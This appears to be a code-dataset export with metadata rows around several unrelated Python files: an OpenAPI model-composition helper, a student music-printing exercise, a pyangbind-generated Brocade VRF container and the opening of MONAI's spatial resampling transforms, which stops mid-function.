        # NOTE(review): allows_single_value_input is defined elsewhere in
        # this module; presumably True for ModelSimple-style schemas.
        single_value_input = allows_single_value_input(oneof_class)
        if not single_value_input:
            # transform js keys from input data to python keys in fixed_model_args
            fixed_model_args = change_keys_js_to_python(
                model_kwargs, oneof_class)
            # Extract a dict with the properties that are declared in the oneOf schema.
            # Undeclared properties (e.g. properties that are allowed because of the
            # additionalProperties attribute in the OAS document) are not added to
            # the dict.
            kwargs = {}
            var_names = set(oneof_class.openapi_types.keys())
            for var_name in var_names:
                if var_name in fixed_model_args:
                    kwargs[var_name] = fixed_model_args[var_name]
            # do not try to make a model with no input args
            if len(kwargs) == 0:
                continue
            # and use it to make the instance
            kwargs.update(constant_kwargs)
        try:
            if not single_value_input:
                oneof_instance = oneof_class(**kwargs)
            else:
                if issubclass(oneof_class, ModelSimple):
                    oneof_instance = oneof_class(model_arg, **constant_kwargs)
                elif oneof_class in PRIMITIVE_TYPES:
                    oneof_instance = validate_and_convert_types(
                        model_arg,
                        (oneof_class,),
                        constant_kwargs['_path_to_item'],
                        constant_kwargs['_spec_property_naming'],
                        constant_kwargs['_check_type'],
                        configuration=constant_kwargs['_configuration']
                    )
            oneof_instances.append(oneof_instance)
        except Exception:
            # A failed construction just means this oneOf schema does not
            # match; try the next one.
            pass
    if len(oneof_instances) == 0:
        raise ApiValueError(
            "Invalid inputs given to generate an instance of %s. None "
            "of the oneOf schemas matched the input data." %
            cls.__name__
        )
    elif len(oneof_instances) > 1:
        raise ApiValueError(
            "Invalid inputs given to generate an instance of %s. Multiple "
            "oneOf schemas matched the inputs, but a max of one is allowed." %
            cls.__name__
        )
    return oneof_instances[0]
def get_anyof_instances(self, model_args, constant_args):
    """Instantiate every anyOf schema of self that matches the input.

    Args:
        self: the composed model being built.
        model_args (dict): property values, keyed by javascript names.
        constant_args (dict): the _check_type/_path_to_item/... kwargs.

    Returns:
        list: the matching anyOf instances (empty when no anyOf declared).

    Raises:
        ApiValueError: when anyOf schemas exist but none matched.
    """
    anyof_instances = []
    if len(self._composed_schemas['anyOf']) == 0:
        return anyof_instances
    for anyof_class in self._composed_schemas['anyOf']:
        # The composed anyOf schema allows the 'null' type and the input data
        # is the null value. This is a OAS >= 3.1 feature.
        if anyof_class is none_type:
            # skip none_types because we are deserializing dict data.
            # none_type deserialization is handled in the __new__ method
            continue
        # transform js keys to python keys in fixed_model_args
        fixed_model_args = change_keys_js_to_python(model_args, anyof_class)
        # extract a dict of only required keys from these_model_vars
        kwargs = {}
        var_names = set(anyof_class.openapi_types.keys())
        for var_name in var_names:
            if var_name in fixed_model_args:
                kwargs[var_name] = fixed_model_args[var_name]
        # do not try to make a model with no input args
        if len(kwargs) == 0:
            continue
        # and use it to make the instance
        kwargs.update(constant_args)
        try:
            anyof_instance = anyof_class(**kwargs)
            anyof_instances.append(anyof_instance)
        except Exception:
            # A failed construction just means this anyOf schema does not
            # match; try the next one.
            pass
    if len(anyof_instances) == 0:
        raise ApiValueError(
            "Invalid inputs given to generate an instance of %s. None of the "
            "anyOf schemas matched the inputs." %
            self.__class__.__name__
        )
    return anyof_instances
def get_additional_properties_model_instances(
        composed_instances, self):
    """Return the instances (self plus composed children) whose schemas
    accept additional properties."""
    candidates = [self]
    candidates.extend(composed_instances)
    return [instance for instance in candidates
            if instance.additional_properties_type is not None]
def get_var_name_to_model_instances(self, composed_instances):
    """Map each declared property name to the instances that declare it."""
    mapping = {}
    for instance in [self] + list(composed_instances):
        for var_name in instance.openapi_types:
            # Several instances may declare the same property; collect all.
            mapping.setdefault(var_name, []).append(instance)
    return mapping
def get_unused_args(self, composed_instances, model_args):
    """Return the model_args consumed by neither self nor its composed instances.

    Arguments passed to self were already converted to python names before
    __init__ was called, so self and allOf instances are matched on python
    names; oneOf/anyOf instances are matched on their javascript names.
    """
    consumed = set(self.attribute_map)
    for instance in composed_instances:
        if instance.__class__ in self._composed_schemas['allOf']:
            consumed.update(instance.attribute_map)
        else:
            consumed.update(instance.attribute_map.values())
    return {name: value for name, value in model_args.items()
            if name not in consumed}
def validate_get_composed_info(constant_args, model_args, self):
    """Build all composed (allOf/oneOf/anyOf) child instances for self.

    Args:
        constant_args (dict): the _check_type/_path_to_item/... kwargs.
        model_args (dict): the property values for the composed model.
        self: the composed model being initialized.

    Returns:
        list of [composed_instances, var_name_to_model_instances,
        additional_properties_model_instances, unused_args].

    Raises:
        ApiValueError: when inputs are left over but no schema accepts
            additional properties (and discard_unknown_keys is off).
    """
    # create composed_instances
    composed_instances = []
    allof_instances = get_allof_instances(self, model_args, constant_args)
    composed_instances.extend(allof_instances)
    oneof_instance = get_oneof_instance(self.__class__, model_args, constant_args)
    if oneof_instance is not None:
        composed_instances.append(oneof_instance)
    anyof_instances = get_anyof_instances(self, model_args, constant_args)
    composed_instances.extend(anyof_instances)
    # map variable names to composed_instances
    var_name_to_model_instances = get_var_name_to_model_instances(
        self, composed_instances)
    # set additional_properties_model_instances
    additional_properties_model_instances = (
        get_additional_properties_model_instances(composed_instances, self)
    )
    # set any remaining values
    unused_args = get_unused_args(self, composed_instances, model_args)
    if len(unused_args) > 0 and \
            len(additional_properties_model_instances) == 0 and \
            (self._configuration is None or
                not self._configuration.discard_unknown_keys):
        raise ApiValueError(
            "Invalid input arguments input when making an instance of "
            "class %s. Not all inputs were used. The unused input data "
            "is %s" % (self.__class__.__name__, unused_args)
        )
    # no need to add additional_properties to var_name_to_model_instances here
    # because additional_properties_model_instances will direct us to that
    # instance when we use getattr or setattr
    # and we update var_name_to_model_instances in setattr
    return [
        composed_instances,
        var_name_to_model_instances,
        additional_properties_model_instances,
        unused_args
    ]
| true | true |
f73279dc5fe54fd731c68c1129c641f01a89beae | 596 | py | Python | Exercises/Exercises Chapter 08/8.1.py | tonysulfaro/CSE-231 | 0e3ff5422fe42624a90a17d7f33174346662a6fc | [
"MIT"
] | 2 | 2021-09-23T19:17:24.000Z | 2021-11-29T09:03:56.000Z | Exercises/Exercises Chapter 08/8.1.py | tonysulfaro/CSE-231 | 0e3ff5422fe42624a90a17d7f33174346662a6fc | [
"MIT"
] | null | null | null | Exercises/Exercises Chapter 08/8.1.py | tonysulfaro/CSE-231 | 0e3ff5422fe42624a90a17d7f33174346662a6fc | [
"MIT"
] | 1 | 2020-10-25T13:03:18.000Z | 2020-10-25T13:03:18.000Z | #definition for music_func goes here
def music_func(music, group, singer):
    """Print the favorite music genre, band, and lead vocalist, one per line."""
    favorites = (
        ("The best kind of music is", music),
        ("The best music group is", group),
        ("The best lead vocalist is", singer),
    )
    for label, value in favorites:
        print(label, value)
def main():
    """Read 'music,group,singer' lines from stdin and echo them via music_func.
    Stops when the user enters 'quit' as the music value; on end-of-input or a
    malformed line (not exactly three comma-separated fields) it prints a
    default favorite once and returns.
    """
    music, group, singer = '', '', ''
    while music != 'quit':
        try:
            music, group, singer = input().split(',')
            music_func(music, group, singer)
        except (EOFError, ValueError):
            music, group, singer = 'Classic Rock', 'The Beatles', 'Freddie Mercury'
            music_func(music, group, singer)
            # `return` rather than quit(): quit() is an interactive-session helper
            # that raises SystemExit and should not be called from program code.
            return
if __name__ == "__main__":
    # Guard the entry point so importing this module has no side effects.
    # (The original call line was also corrupted with non-Python residue,
    # which made it a syntax error.)
    main()
def music_func(music, group, singer):
    """Print the favorite music genre, band, and lead vocalist, one per line."""
    print("The best kind of music is", music)
    print("The best music group is", group)
    print("The best lead vocalist is", singer)
def main():
    """Read 'music,group,singer' lines from stdin and echo them via music_func.
    Stops when the user enters 'quit' as the music value; on end-of-input or a
    malformed line (not exactly three comma-separated fields) it prints a
    default favorite once and returns.
    """
    music, group, singer = '', '', ''
    while music != 'quit':
        try:
            music, group, singer = input().split(',')
            music_func(music, group, singer)
        except (EOFError, ValueError):
            music, group, singer = 'Classic Rock', 'The Beatles', 'Freddie Mercury'
            music_func(music, group, singer)
            # `return` rather than quit(): quit() is an interactive-session helper
            # that raises SystemExit and should not be called from program code.
            return
if __name__ == "__main__":
    # Guard the entry point so importing this module has no side effects.
    # (The original call line was also corrupted with non-Python residue,
    # which made it a syntax error.)
    main()
f7327a79deea631d212afcb19ff20ebec7be7258 | 7,139 | py | Python | pybind/slxos/v16r_1_00b/vrf/address_family/ip/unicast/ip/import_/__init__.py | shivharis/pybind | 4e1c6d54b9fd722ccec25546ba2413d79ce337e6 | [
"Apache-2.0"
] | null | null | null | pybind/slxos/v16r_1_00b/vrf/address_family/ip/unicast/ip/import_/__init__.py | shivharis/pybind | 4e1c6d54b9fd722ccec25546ba2413d79ce337e6 | [
"Apache-2.0"
] | null | null | null | pybind/slxos/v16r_1_00b/vrf/address_family/ip/unicast/ip/import_/__init__.py | shivharis/pybind | 4e1c6d54b9fd722ccec25546ba2413d79ce337e6 | [
"Apache-2.0"
] | 1 | 2021-11-05T22:15:42.000Z | 2021-11-05T22:15:42.000Z |
from operator import attrgetter
import pyangbind.lib.xpathhelper as xpathhelper
from pyangbind.lib.yangtypes import RestrictedPrecisionDecimalType, RestrictedClassType, TypedListType
from pyangbind.lib.yangtypes import YANGBool, YANGListType, YANGDynClass, ReferenceType
from pyangbind.lib.base import PybindBase
from decimal import Decimal
from bitarray import bitarray
import __builtin__
import routes
class import_(PybindBase):
  """
  This class was auto-generated by the PythonClass plugin for PYANG
  from YANG module brocade-vrf - based on the path /vrf/address-family/ip/unicast/ip/import. Each member element of
  the container is represented as a class variable - with a specific
  YANG type.
  """
  __slots__ = ('_pybind_generated_by', '_path_helper', '_yang_name', '_rest_name', '_extmethods', '__routes',)
  _yang_name = 'import'
  _rest_name = 'import'
  _pybind_generated_by = 'container'
  def __init__(self, *args, **kwargs):
    # Resolve the XPath helper: an explicit keyword argument wins, otherwise
    # inherit the parent's helper, otherwise disable path registration.
    path_helper_ = kwargs.pop("path_helper", None)
    if path_helper_ is False:
      self._path_helper = False
    elif path_helper_ is not None and isinstance(path_helper_, xpathhelper.YANGPathHelper):
      self._path_helper = path_helper_
    elif hasattr(self, "_parent"):
      path_helper_ = getattr(self._parent, "_path_helper", False)
      self._path_helper = path_helper_
    else:
      self._path_helper = False
    # Extension methods are resolved the same way: keyword, then parent, else off.
    extmethods = kwargs.pop("extmethods", None)
    if extmethods is False:
      self._extmethods = False
    elif extmethods is not None and isinstance(extmethods, dict):
      self._extmethods = extmethods
    elif hasattr(self, "_parent"):
      extmethods = getattr(self._parent, "_extmethods", None)
      self._extmethods = extmethods
    else:
      self._extmethods = False
    self.__routes = YANGDynClass(base=YANGListType("src_vrf route_map",routes.routes, yang_name="routes", rest_name="routes", parent=self, is_container='list', user_ordered=False, path_helper=self._path_helper, yang_keys='src-vrf route-map', extensions={u'tailf-common': {u'info': u'import IPV4 routes ', u'cli-suppress-mode': None, u'callpoint': u'Ipv4ImportRoutes'}}), is_container='list', yang_name="routes", rest_name="routes", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'import IPV4 routes ', u'cli-suppress-mode': None, u'callpoint': u'Ipv4ImportRoutes'}}, namespace='urn:brocade.com:mgmt:brocade-rtm', defining_module='brocade-rtm', yang_type='list', is_config=True)
    # A single positional argument may be another instance of this container;
    # copy across every changed element through the generated _set_* methods.
    load = kwargs.pop("load", None)
    if args:
      if len(args) > 1:
        raise TypeError("cannot create a YANG container with >1 argument")
      all_attr = True
      for e in self._pyangbind_elements:
        if not hasattr(args[0], e):
          all_attr = False
          break
      if not all_attr:
        raise ValueError("Supplied object did not have the correct attributes")
      for e in self._pyangbind_elements:
        nobj = getattr(args[0], e)
        if nobj._changed() is False:
          continue
        setmethod = getattr(self, "_set_%s" % e)
        if load is None:
          setmethod(getattr(args[0], e))
        else:
          setmethod(getattr(args[0], e), load=load)
  def _path(self):
    # YANG data path; falls back to the absolute path when there is no parent.
    if hasattr(self, "_parent"):
      return self._parent._path()+[self._yang_name]
    else:
      return [u'vrf', u'address-family', u'ip', u'unicast', u'ip', u'import']
  def _rest_path(self):
    # REST path; note the REST tree uses 'ipv4' where the YANG tree uses 'ip'.
    if hasattr(self, "_parent"):
      if self._rest_name:
        return self._parent._rest_path()+[self._rest_name]
      else:
        return self._parent._rest_path()
    else:
      return [u'vrf', u'address-family', u'ipv4', u'unicast', u'ip', u'import']
  def _get_routes(self):
    """
    Getter method for routes, mapped from YANG variable /vrf/address_family/ip/unicast/ip/import/routes (list)
    YANG Description: import IPV4 routes
    """
    return self.__routes
  def _set_routes(self, v, load=False):
    """
    Setter method for routes, mapped from YANG variable /vrf/address_family/ip/unicast/ip/import/routes (list)
    If this variable is read-only (config: false) in the
    source YANG file, then _set_routes is considered as a private
    method. Backends looking to populate this variable should
    do so via calling thisObj._set_routes() directly.
    YANG Description: import IPV4 routes
    """
    if hasattr(v, "_utype"):
      v = v._utype(v)
    try:
      t = YANGDynClass(v,base=YANGListType("src_vrf route_map",routes.routes, yang_name="routes", rest_name="routes", parent=self, is_container='list', user_ordered=False, path_helper=self._path_helper, yang_keys='src-vrf route-map', extensions={u'tailf-common': {u'info': u'import IPV4 routes ', u'cli-suppress-mode': None, u'callpoint': u'Ipv4ImportRoutes'}}), is_container='list', yang_name="routes", rest_name="routes", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'import IPV4 routes ', u'cli-suppress-mode': None, u'callpoint': u'Ipv4ImportRoutes'}}, namespace='urn:brocade.com:mgmt:brocade-rtm', defining_module='brocade-rtm', yang_type='list', is_config=True)
    except (TypeError, ValueError):
      raise ValueError({
          'error-string': """routes must be of a type compatible with list""",
          'defined-type': "list",
          'generated-type': """YANGDynClass(base=YANGListType("src_vrf route_map",routes.routes, yang_name="routes", rest_name="routes", parent=self, is_container='list', user_ordered=False, path_helper=self._path_helper, yang_keys='src-vrf route-map', extensions={u'tailf-common': {u'info': u'import IPV4 routes ', u'cli-suppress-mode': None, u'callpoint': u'Ipv4ImportRoutes'}}), is_container='list', yang_name="routes", rest_name="routes", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'import IPV4 routes ', u'cli-suppress-mode': None, u'callpoint': u'Ipv4ImportRoutes'}}, namespace='urn:brocade.com:mgmt:brocade-rtm', defining_module='brocade-rtm', yang_type='list', is_config=True)""",
        })
    self.__routes = t
    if hasattr(self, '_set'):
      self._set()
  def _unset_routes(self):
    # Reset `routes` back to a fresh, empty generated list.
    self.__routes = YANGDynClass(base=YANGListType("src_vrf route_map",routes.routes, yang_name="routes", rest_name="routes", parent=self, is_container='list', user_ordered=False, path_helper=self._path_helper, yang_keys='src-vrf route-map', extensions={u'tailf-common': {u'info': u'import IPV4 routes ', u'cli-suppress-mode': None, u'callpoint': u'Ipv4ImportRoutes'}}), is_container='list', yang_name="routes", rest_name="routes", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'import IPV4 routes ', u'cli-suppress-mode': None, u'callpoint': u'Ipv4ImportRoutes'}}, namespace='urn:brocade.com:mgmt:brocade-rtm', defining_module='brocade-rtm', yang_type='list', is_config=True)
  routes = __builtin__.property(_get_routes, _set_routes)
  _pyangbind_elements = {'routes': routes, }
| 55.773438 | 779 | 0.713966 |
from operator import attrgetter
import pyangbind.lib.xpathhelper as xpathhelper
from pyangbind.lib.yangtypes import RestrictedPrecisionDecimalType, RestrictedClassType, TypedListType
from pyangbind.lib.yangtypes import YANGBool, YANGListType, YANGDynClass, ReferenceType
from pyangbind.lib.base import PybindBase
from decimal import Decimal
from bitarray import bitarray
import __builtin__
import routes
class import_(PybindBase):
  """Auto-generated pyangbind container for the YANG path
  /vrf/address-family/ip/unicast/ip/import (module brocade-vrf).
  """
  __slots__ = ('_pybind_generated_by', '_path_helper', '_yang_name', '_rest_name', '_extmethods', '__routes',)
  _yang_name = 'import'
  _rest_name = 'import'
  _pybind_generated_by = 'container'
  def __init__(self, *args, **kwargs):
    """Build the container; a single positional argument copies changed elements."""
    # Resolve the XPath helper: explicit keyword wins, then the parent's, else off.
    path_helper_ = kwargs.pop("path_helper", None)
    if path_helper_ is False:
      self._path_helper = False
    elif path_helper_ is not None and isinstance(path_helper_, xpathhelper.YANGPathHelper):
      self._path_helper = path_helper_
    elif hasattr(self, "_parent"):
      path_helper_ = getattr(self._parent, "_path_helper", False)
      self._path_helper = path_helper_
    else:
      self._path_helper = False
    # Extension methods are resolved the same way: keyword, then parent, else off.
    extmethods = kwargs.pop("extmethods", None)
    if extmethods is False:
      self._extmethods = False
    elif extmethods is not None and isinstance(extmethods, dict):
      self._extmethods = extmethods
    elif hasattr(self, "_parent"):
      extmethods = getattr(self._parent, "_extmethods", None)
      self._extmethods = extmethods
    else:
      self._extmethods = False
    self.__routes = YANGDynClass(base=YANGListType("src_vrf route_map",routes.routes, yang_name="routes", rest_name="routes", parent=self, is_container='list', user_ordered=False, path_helper=self._path_helper, yang_keys='src-vrf route-map', extensions={u'tailf-common': {u'info': u'import IPV4 routes ', u'cli-suppress-mode': None, u'callpoint': u'Ipv4ImportRoutes'}}), is_container='list', yang_name="routes", rest_name="routes", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'import IPV4 routes ', u'cli-suppress-mode': None, u'callpoint': u'Ipv4ImportRoutes'}}, namespace='urn:brocade.com:mgmt:brocade-rtm', defining_module='brocade-rtm', yang_type='list', is_config=True)
    # A single positional argument may be another instance of this container;
    # copy across every changed element through the generated _set_* methods.
    load = kwargs.pop("load", None)
    if args:
      if len(args) > 1:
        raise TypeError("cannot create a YANG container with >1 argument")
      all_attr = True
      for e in self._pyangbind_elements:
        if not hasattr(args[0], e):
          all_attr = False
          break
      if not all_attr:
        raise ValueError("Supplied object did not have the correct attributes")
      for e in self._pyangbind_elements:
        nobj = getattr(args[0], e)
        if nobj._changed() is False:
          continue
        setmethod = getattr(self, "_set_%s" % e)
        if load is None:
          setmethod(getattr(args[0], e))
        else:
          setmethod(getattr(args[0], e), load=load)
  def _path(self):
    """Return the YANG data path of this container."""
    if hasattr(self, "_parent"):
      return self._parent._path()+[self._yang_name]
    else:
      return [u'vrf', u'address-family', u'ip', u'unicast', u'ip', u'import']
  def _rest_path(self):
    """Return the REST path (uses 'ipv4' where the YANG tree uses 'ip')."""
    if hasattr(self, "_parent"):
      if self._rest_name:
        return self._parent._rest_path()+[self._rest_name]
      else:
        return self._parent._rest_path()
    else:
      return [u'vrf', u'address-family', u'ipv4', u'unicast', u'ip', u'import']
  def _get_routes(self):
    """Getter for the `routes` list (/vrf/.../import/routes)."""
    return self.__routes
  def _set_routes(self, v, load=False):
    """Setter for the `routes` list; raises ValueError on incompatible input."""
    if hasattr(v, "_utype"):
      v = v._utype(v)
    try:
      t = YANGDynClass(v,base=YANGListType("src_vrf route_map",routes.routes, yang_name="routes", rest_name="routes", parent=self, is_container='list', user_ordered=False, path_helper=self._path_helper, yang_keys='src-vrf route-map', extensions={u'tailf-common': {u'info': u'import IPV4 routes ', u'cli-suppress-mode': None, u'callpoint': u'Ipv4ImportRoutes'}}), is_container='list', yang_name="routes", rest_name="routes", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'import IPV4 routes ', u'cli-suppress-mode': None, u'callpoint': u'Ipv4ImportRoutes'}}, namespace='urn:brocade.com:mgmt:brocade-rtm', defining_module='brocade-rtm', yang_type='list', is_config=True)
    except (TypeError, ValueError):
      raise ValueError({
          'error-string': """routes must be of a type compatible with list""",
          'defined-type': "list",
          'generated-type': """YANGDynClass(base=YANGListType("src_vrf route_map",routes.routes, yang_name="routes", rest_name="routes", parent=self, is_container='list', user_ordered=False, path_helper=self._path_helper, yang_keys='src-vrf route-map', extensions={u'tailf-common': {u'info': u'import IPV4 routes ', u'cli-suppress-mode': None, u'callpoint': u'Ipv4ImportRoutes'}}), is_container='list', yang_name="routes", rest_name="routes", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'import IPV4 routes ', u'cli-suppress-mode': None, u'callpoint': u'Ipv4ImportRoutes'}}, namespace='urn:brocade.com:mgmt:brocade-rtm', defining_module='brocade-rtm', yang_type='list', is_config=True)""",
        })
    self.__routes = t
    if hasattr(self, '_set'):
      self._set()
  def _unset_routes(self):
    """Reset `routes` back to a fresh, empty generated list."""
    self.__routes = YANGDynClass(base=YANGListType("src_vrf route_map",routes.routes, yang_name="routes", rest_name="routes", parent=self, is_container='list', user_ordered=False, path_helper=self._path_helper, yang_keys='src-vrf route-map', extensions={u'tailf-common': {u'info': u'import IPV4 routes ', u'cli-suppress-mode': None, u'callpoint': u'Ipv4ImportRoutes'}}), is_container='list', yang_name="routes", rest_name="routes", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'import IPV4 routes ', u'cli-suppress-mode': None, u'callpoint': u'Ipv4ImportRoutes'}}, namespace='urn:brocade.com:mgmt:brocade-rtm', defining_module='brocade-rtm', yang_type='list', is_config=True)
  routes = __builtin__.property(_get_routes, _set_routes)
  _pyangbind_elements = {'routes': routes, }
| true | true |
f7327aa07b2ff6ab2654821bbe8ee0851143350f | 121,870 | py | Python | monai/transforms/spatial/array.py | Jianrong-Lu/MONAI | c319ca8ff31aa980a045f1b913fb2eb22aadb080 | [
"Apache-2.0"
] | 1 | 2022-03-16T01:18:43.000Z | 2022-03-16T01:18:43.000Z | monai/transforms/spatial/array.py | Jianrong-Lu/MONAI | c319ca8ff31aa980a045f1b913fb2eb22aadb080 | [
"Apache-2.0"
] | null | null | null | monai/transforms/spatial/array.py | Jianrong-Lu/MONAI | c319ca8ff31aa980a045f1b913fb2eb22aadb080 | [
"Apache-2.0"
] | null | null | null | # Copyright (c) MONAI Consortium
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
A collection of "vanilla" transforms for spatial operations
https://github.com/Project-MONAI/MONAI/wiki/MONAI_Design
"""
import warnings
from copy import deepcopy
from typing import Any, Callable, Dict, List, Optional, Sequence, Tuple, Union
import numpy as np
import torch
from monai.config import USE_COMPILED, DtypeLike
from monai.config.type_definitions import NdarrayOrTensor
from monai.data.utils import AFFINE_TOL, compute_shape_offset, reorient_spatial_axes, to_affine_nd, zoom_affine
from monai.networks.layers import AffineTransform, GaussianFilter, grid_pull
from monai.networks.utils import meshgrid_ij, normalize_transform
from monai.transforms.croppad.array import CenterSpatialCrop, Pad
from monai.transforms.transform import Randomizable, RandomizableTransform, ThreadUnsafe, Transform
from monai.transforms.utils import (
create_control_grid,
create_grid,
create_rotate,
create_scale,
create_shear,
create_translate,
map_spatial_axes,
)
from monai.transforms.utils_pytorch_numpy_unification import allclose, moveaxis
from monai.utils import (
GridSampleMode,
GridSamplePadMode,
InterpolateMode,
NumpyPadMode,
PytorchPadMode,
ensure_tuple,
ensure_tuple_rep,
ensure_tuple_size,
fall_back_tuple,
issequenceiterable,
optional_import,
pytorch_after,
)
from monai.utils.deprecate_utils import deprecated_arg
from monai.utils.enums import TransformBackends
from monai.utils.module import look_up_option
from monai.utils.type_conversion import convert_data_type, convert_to_dst_type
# nibabel is optional; `has_nib` gates the nibabel-based reorientation fast path
# used in SpatialResample below.
nib, has_nib = optional_import("nibabel")
__all__ = [
    "SpatialResample",
    "ResampleToMatch",
    "Spacing",
    "Orientation",
    "Flip",
    "GridDistortion",
    "Resize",
    "Rotate",
    "Zoom",
    "Rotate90",
    "RandRotate90",
    "RandRotate",
    "RandFlip",
    "RandGridDistortion",
    "RandAxisFlip",
    "RandZoom",
    "AffineGrid",
    "RandAffineGrid",
    "RandDeformGrid",
    "Resample",
    "Affine",
    "RandAffine",
    "Rand2DElastic",
    "Rand3DElastic",
]
# Alias for a randomization range: a single number, a sequence of numbers and/or
# (min, max) pairs, or None (no randomization).
RandRange = Optional[Union[Sequence[Union[Tuple[float, float], float]], float]]
class SpatialResample(Transform):
    """
    Resample input image from the orientation/spacing defined by ``src_affine`` affine matrix into
    the ones specified by ``dst_affine`` affine matrix.
    Internally this transform computes the affine transform matrix from ``src_affine`` to ``dst_affine``,
    by ``xform = linalg.solve(src_affine, dst_affine)``, and call ``monai.transforms.Affine`` with ``xform``.
    """
    backend = [TransformBackends.TORCH]
    def __init__(
        self,
        mode: Union[GridSampleMode, str] = GridSampleMode.BILINEAR,
        padding_mode: Union[GridSamplePadMode, str] = GridSamplePadMode.BORDER,
        align_corners: bool = False,
        dtype: DtypeLike = np.float64,
    ):
        """
        Args:
            mode: {``"bilinear"``, ``"nearest"``}
                Interpolation mode to calculate output values. Defaults to ``"bilinear"``.
                See also: https://pytorch.org/docs/stable/generated/torch.nn.functional.grid_sample.html
                When `USE_COMPILED` is `True`, this argument uses
                ``"nearest"``, ``"bilinear"``, ``"bicubic"`` to indicate 0, 1, 3 order interpolations.
                See also: https://docs.monai.io/en/stable/networks.html#grid-pull
            padding_mode: {``"zeros"``, ``"border"``, ``"reflection"``}
                Padding mode for outside grid values. Defaults to ``"border"``.
                See also: https://pytorch.org/docs/stable/generated/torch.nn.functional.grid_sample.html
            align_corners: Geometrically, we consider the pixels of the input as squares rather than points.
                See also: https://pytorch.org/docs/stable/generated/torch.nn.functional.grid_sample.html
            dtype: data type for resampling computation. Defaults to ``np.float64`` for best precision.
                If ``None``, use the data type of input data. To be compatible with other modules,
                the output data type is always ``np.float32``.
        """
        self.mode = mode
        self.padding_mode = padding_mode
        self.align_corners = align_corners
        self.dtype = dtype
    def __call__(
        self,
        img: NdarrayOrTensor,
        src_affine: Optional[NdarrayOrTensor] = None,
        dst_affine: Optional[NdarrayOrTensor] = None,
        spatial_size: Optional[Union[Sequence[int], np.ndarray, int]] = None,
        mode: Union[GridSampleMode, str, None] = GridSampleMode.BILINEAR,
        padding_mode: Union[GridSamplePadMode, str, None] = GridSamplePadMode.BORDER,
        align_corners: Optional[bool] = False,
        dtype: DtypeLike = None,
    ) -> Tuple[NdarrayOrTensor, NdarrayOrTensor]:
        """
        Args:
            img: input image to be resampled. It currently supports channel-first arrays with
                at most three spatial dimensions.
            src_affine: source affine matrix. Defaults to ``None``, which means the identity matrix.
                the shape should be `(r+1, r+1)` where `r` is the spatial rank of ``img``.
            dst_affine: destination affine matrix. Defaults to ``None``, which means the same as `src_affine`.
                the shape should be `(r+1, r+1)` where `r` is the spatial rank of ``img``.
                when `dst_affine` and `spatial_size` are None, the input will be returned without resampling,
                but the data type will be `float32`.
            spatial_size: output image spatial size.
                if `spatial_size` and `self.spatial_size` are not defined,
                the transform will compute a spatial size automatically containing the previous field of view.
                if `spatial_size` is ``-1`` are the transform will use the corresponding input img size.
            mode: {``"bilinear"``, ``"nearest"``}
                Interpolation mode to calculate output values. Defaults to ``"bilinear"``.
                See also: https://pytorch.org/docs/stable/generated/torch.nn.functional.grid_sample.html
                When `USE_COMPILED` is `True`, this argument uses
                ``"nearest"``, ``"bilinear"``, ``"bicubic"`` to indicate 0, 1, 3 order interpolations.
                See also: https://docs.monai.io/en/stable/networks.html#grid-pull
            padding_mode: {``"zeros"``, ``"border"``, ``"reflection"``}
                Padding mode for outside grid values. Defaults to ``"border"``.
                See also: https://pytorch.org/docs/stable/generated/torch.nn.functional.grid_sample.html
            align_corners: Geometrically, we consider the pixels of the input as squares rather than points.
                See also: https://pytorch.org/docs/stable/generated/torch.nn.functional.grid_sample.html
            dtype: data type for resampling computation. Defaults to ``self.dtype`` or
                ``np.float64`` (for best precision). If ``None``, use the data type of input data.
                To be compatible with other modules, the output data type is always `float32`.
        The spatial rank is determined by the smallest among ``img.ndim -1``, ``len(src_affine) - 1``, and ``3``.
        When both ``monai.config.USE_COMPILED`` and ``align_corners`` are set to ``True``,
        MONAI's resampling implementation will be used.
        Set `dst_affine` and `spatial_size` to `None` to turn off the resampling step.
        """
        if src_affine is None:
            src_affine = np.eye(4, dtype=np.float64)
        spatial_rank = min(len(img.shape) - 1, src_affine.shape[0] - 1, 3)
        if (not isinstance(spatial_size, int) or spatial_size != -1) and spatial_size is not None:
            spatial_rank = min(len(ensure_tuple(spatial_size)), 3)  # infer spatial rank based on spatial_size
        src_affine = to_affine_nd(spatial_rank, src_affine)
        # default the destination affine to the source affine (no reorientation)
        dst_affine = to_affine_nd(spatial_rank, dst_affine) if dst_affine is not None else src_affine
        dst_affine, *_ = convert_to_dst_type(dst_affine, dst_affine, dtype=torch.float32)
        in_spatial_size = np.asarray(img.shape[1 : spatial_rank + 1])
        if isinstance(spatial_size, int) and (spatial_size == -1):  # using the input spatial size
            spatial_size = in_spatial_size
        elif spatial_size is None and spatial_rank > 1:  # auto spatial size
            spatial_size, _ = compute_shape_offset(in_spatial_size, src_affine, dst_affine)  # type: ignore
        spatial_size = np.asarray(fall_back_tuple(ensure_tuple(spatial_size)[:spatial_rank], in_spatial_size))
        if (
            allclose(src_affine, dst_affine, atol=AFFINE_TOL)
            and allclose(spatial_size, in_spatial_size)
            or spatial_rank == 1
        ):
            # no significant change, return original image
            output_data, *_ = convert_to_dst_type(img, img, dtype=torch.float32)
            return output_data, dst_affine
        # fast path (numpy input + nibabel available): when the requested change is a
        # pure axis flip/permutation that already yields ``dst_affine``, apply it directly
        if has_nib and isinstance(img, np.ndarray):
            spatial_ornt, dst_r = reorient_spatial_axes(img.shape[1 : spatial_rank + 1], src_affine, dst_affine)
